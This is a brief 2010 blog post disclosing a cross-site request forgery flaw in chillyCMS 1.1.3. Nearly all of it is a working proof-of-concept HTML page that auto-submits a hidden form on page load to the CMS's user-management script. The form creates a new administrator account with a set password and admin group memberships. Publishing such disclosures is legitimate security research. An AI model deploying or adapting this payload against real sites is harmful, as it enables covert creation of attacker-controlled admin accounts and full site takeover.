This site is soon to be deprecated by http://www.johnleitch.net

Sunday, July 11, 2010

chillyCMS 1.1.3 Cross-site Request Forgery

A cross-site request forgery vulnerability in chillyCMS 1.1.3 can be exploited to create a new admin.

PoC
<html>
<body onload="document.forms[0].submit()">
<form method="POST" action="http://localhost/chillyCMS/admin/usersgroups.site.php">
<input type="hidden" name="user" value="new_admin" />
<input type="hidden" name="name" value="a" />
<input type="hidden" name="pw" value="Password1" />
<input type="hidden" name="pw2" value="Password1" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="gids%5B%5D" value="1" />
<input type="hidden" name="gids%5B%5D" value="3" />
<input type="hidden" name="gids%5B%5D" value="4" />
<input type="hidden" name="active" value="1" />
<input type="hidden" name="language" value="en" />
<input type="hidden" name="getnewsletter" value="1" />
<input type="hidden" name="myaction" value="new" />
<input type="hidden" name="action" value="updateuser" />
<input type="hidden" name="id" value="" />
</form>
</body>
</html>

4 comments: